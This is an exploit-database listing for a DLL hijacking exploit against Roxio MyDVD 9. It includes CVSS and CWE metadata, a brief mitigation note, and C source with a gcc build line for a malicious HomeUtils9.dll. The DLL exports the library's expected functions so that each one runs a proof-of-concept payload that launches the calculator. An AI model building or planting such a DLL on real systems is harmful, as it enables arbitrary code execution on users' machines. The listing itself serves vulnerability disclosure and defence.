Roxio MyDVD 9 DLL Hijacking Exploit (HomeUtils9.dll)

vendor:

MyDVD 9

by:

storm

7.5

CVSS

HIGH

DLL Hijacking

427

CWE

Product Name: MyDVD 9

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows Vista SP2

2010

Roxio MyDVD 9 DLL Hijacking Exploit (HomeUtils9.dll)

This exploit targets Roxio MyDVD 9 software and utilizes a DLL hijacking technique. By placing a malicious DLL file named HomeUtils9.dll in the same directory as the vulnerable software, an attacker can execute arbitrary code with the privileges of the user running the software. This can lead to unauthorized access, privilege escalation, or remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to update Roxio MyDVD 9 to the latest version. Additionally, users should exercise caution when running software from untrusted sources.

Source

Exploit-DB raw data:

/*

Exploit Title: Roxio MyDVD 9 DLL Hijacking Exploit (HomeUtils9.dll)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -shared -o HomeUtils9.dll MyDVD9-DLL.c

.dmsd and .dmsm files are affected.

*/

#include <windows.h>
#define DllExport __declspec (dllexport)

DllExport void Dispatch_InvokeUpdate() { hax(); }
DllExport void GetCertificateItemValue() { hax(); }
DllExport void GetFeatureEnabled() { hax(); }
DllExport void GetFeatureEnabledGroup() { hax(); }
DllExport void GetFeatureGroup() { hax(); }
DllExport void GetFeatureGroupActivationDetail() { hax(); }
DllExport void GetRoxioKeyContents() { hax(); }
DllExport void LaunchPermission() { hax(); }
DllExport void LaunchPermission_Str() { hax(); }
DllExport void SAR_Dispatch_ActivateComponent() { hax(); }
DllExport void SAR_Dispatch_ActivateProduct() { hax(); }
DllExport void SAR_Dispatch_ActivateProductGroup() { hax(); }
DllExport void SAR_Dispatch_DoRegister() { hax(); }
DllExport void SAR_Dispatch_GetActivationDetail() { hax(); }
DllExport void SAR_Dispatch_IncrementUsage() { hax(); }
DllExport void SAR_Dispatch_IsActivated() { hax(); }
DllExport void SAR_Dispatch_IsRegistered() { hax(); }
DllExport void SAR_Dispatch_ReleaseActivation() { hax(); }
DllExport void SAR_GetCDKey() { hax(); }
DllExport void SAR_UsePermissionsCache() { hax(); }
DllExport void Upgrade() { hax(); }
DllExport void UseCodecPermission() { hax(); }

int hax()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}